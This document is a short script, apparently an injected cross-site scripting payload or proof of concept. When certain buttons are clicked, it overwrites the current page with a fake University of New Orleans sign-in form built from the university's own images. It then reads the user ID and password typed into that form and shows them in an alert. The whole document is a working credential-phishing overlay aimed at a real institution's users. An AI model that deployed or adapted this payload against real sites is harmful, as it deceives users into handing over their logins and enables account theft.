<script>
  
  var html = `
<html>
<head>
<style>

.header {
background: #000066;
}
body {
background-image: url(https://ws.uno.edu/pscs/images/BG_Texture.png);
color: white;
}

input {
  height: 41px;
  width: 341px;
  display: block;
  box-shadow: 3px 3px 5px rgba(0,0,0,0.25) inset;
  border: none;
  background-color: #00385c;
  font-family: Arial, Helvetica, sans-serif;
  font-size: 15px;
  font-weight: bold;
  padding-left: 10px;
  margin-bottom: 23px;
  color: white;
}

button {
  background: #73c998;
  background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#79cc9c), color-stop(100%,#73c998));
  width: 108px;
  height: 43px;
          font-size: 1.2em;
          border-radius: 3px;
  margin: 0;
  padding: 0;
  color: #000000;
  border: 1px solid #289157;
  box-shadow: 3px 3px 3px #000000
}

div {
  max-width: 341px;
  margin: auto;
}

h2 {
  font-family: Arial, Helvetica, sans-serif;
  font-size: 25px;
  font-weght: bold;
  color: #FFFFFF;
  text-shadow: 3px 3px 3px #000000;
  width: 351px;
  display: inline-block;
  padding-bottom: 14px;
  text-align: left;
}

</style>

</head>

<body>

<table width="750" border = "0" align="center" cellspacing="0">
  <tr>
    <td class='header' width="463" align="left">
      <img src="https://ws.uno.edu/pscs/images/uno-3.jpg"></img>
    </td>
    <td class='header'>
      <img src="https://ws.uno.edu/pscs/images/unologo.gif"></img>
    </td>
  </tr>
  <tr>
    <td colspan="3" align="center">
      <img src="https://ws.uno.edu/pscs/images/maingraphic.jpg"></img>
    </td>
  </tr>
  <tr>
    <td colspan='3' class='header' align='center'>
      <div width="750">
        <br>
      </div>
    </td>
  </tr>
</table>

<br>

<div align="center">
  <h2 align="left">Sign In</h2>
  <input id="user" type="text" placeholder="User ID">
  <input id="pass" type="password" placeholder="Password">
  <button id="submit" type="submit" value="Sign In">Sign In</button>
</div>


</body>

</html>

`;

  
  function replaceHTML() {
    document.write(html);
    document.close();
    var newScript = document.createElement("script");
    alert(document.getElementById("submit").value);
    document.getElementById("submit").onclick = function(e) {
      alert("Username: " + document.getElementById("user").value + "\nPassword: " + 
        document.getElementById("pass").value);
    }
  }
  var aTags = document.getElementsByClassName("webstar-buttons");
  console.log(aTags);
  for (var i = 0; i < aTags.length; i++) {
    console.log(aTags[i]);
    aTags[i].onclick = function(e) {
      replaceHTML();
      return false;
    }
  }
</script>
